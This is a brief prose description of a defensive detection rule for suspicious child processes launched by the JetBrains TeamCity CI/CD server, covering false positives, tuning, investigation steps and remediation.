This detection rule identifies potentially malicious child processes spawned by the JetBrains TeamCity process. TeamCity is a continuous integration and deployment server that can be targeted for remote code execution vulnerabilities. The rule is designed to flag unusual child process activity initiated by Java executables associated with TeamCity. It effectively applies a query to look for processes that are started by the TeamCity Java executable and match a list of known suspicious executables such as command-line utilities. False positives might arise from legitimate processes like PowerShell and cmd.exe which are often integral to software builds and deployments using TeamCity. To mitigate false positives, the guide suggests tuning the rule to account for expected behaviors within the environment and excluding known safe operations. Investigative steps include reviewing process trees, examining arguments for suspicious command execution, and correlating activities with security logs for comprehensive analysis. It emphasizes immediate remediation actions such as isolating affected systems and reviewing recent configuration changes.